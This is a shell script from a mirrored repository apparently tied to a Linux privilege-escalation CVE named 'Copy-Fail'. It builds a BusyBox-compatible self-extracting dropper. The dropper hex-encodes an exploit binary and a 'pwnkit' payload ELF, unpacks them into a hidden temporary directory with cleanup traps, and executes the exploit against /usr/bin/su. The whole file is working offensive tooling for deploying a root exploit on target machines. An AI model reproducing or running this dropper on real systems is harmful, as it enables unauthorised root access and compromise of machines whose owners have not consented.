mirror of
https://github.com/4xura/CVE-2026-31431-Copy-Fail.git
synced 2026-05-26 13:20:48 +00:00
76 lines
1.6 KiB
Bash
76 lines
1.6 KiB
Bash
#!/bin/sh
|
|
#
|
|
# Build a BusyBox-compatible self-extracting CopyFail runner.
|
|
#
|
|
# Usage:
|
|
# sh mk_busybox_dropper.sh ./exploit_asm ./payload.pwnkit.elf > copyfail-busybox.sh
|
|
# busybox sh copyfail-busybox.sh /usr/bin/su
|
|
#
|
|
# The generated script uses only common BusyBox applets: sh, printf, chmod,
|
|
# mkdir, rm, cd, and exec.
|
|
|
|
set -eu
|
|
|
|
if [ "$#" -ne 2 ]; then
|
|
echo "usage: $0 <exploit_asm> <payload.pwnkit.elf>" >&2
|
|
exit 1
|
|
fi
|
|
|
|
exploit_bin=$1
|
|
payload_elf=$2
|
|
|
|
[ -r "$exploit_bin" ] || { echo "cannot read exploit binary: $exploit_bin" >&2; exit 1; }
|
|
[ -r "$payload_elf" ] || { echo "cannot read payload ELF: $payload_elf" >&2; exit 1; }
|
|
|
|
emit_file() {
|
|
src=$1
|
|
dst=$2
|
|
|
|
printf "write_blob \"%s\" <<'__COPYFAIL_BLOB__'\n" "$dst"
|
|
od -An -tx1 -v "$src" |
|
|
awk '
|
|
{
|
|
for (i = 1; i <= NF; i++) {
|
|
buf = buf "\\x" $i
|
|
if (length(buf) >= 192) {
|
|
print buf
|
|
buf = ""
|
|
}
|
|
}
|
|
}
|
|
END {
|
|
if (length(buf))
|
|
print buf
|
|
}'
|
|
printf "__COPYFAIL_BLOB__\n"
|
|
}
|
|
|
|
cat <<'EOF'
|
|
#!/bin/sh
|
|
set -eu
|
|
|
|
d=${TMPDIR:-/tmp}/.copyfail.$$
|
|
mkdir "$d" || exit 1
|
|
trap 'rm -rf "$d"' EXIT HUP INT TERM
|
|
umask 077
|
|
|
|
write_blob() {
|
|
out=$1
|
|
: > "$out"
|
|
while IFS= read -r line; do
|
|
[ "$line" = "__COPYFAIL_BLOB__" ] && break
|
|
printf '%b' "$line" >> "$out"
|
|
done
|
|
}
|
|
|
|
EOF
|
|
|
|
emit_file "$exploit_bin" '$d/exploit_asm'
|
|
emit_file "$payload_elf" '$d/payload.pwnkit.elf'
|
|
|
|
cat <<'EOF'
|
|
|
|
chmod 700 "$d/exploit_asm"
|
|
cd "$d"
|
|
exec ./exploit_asm "${1:-/usr/bin/su}"
|
|
EOF
|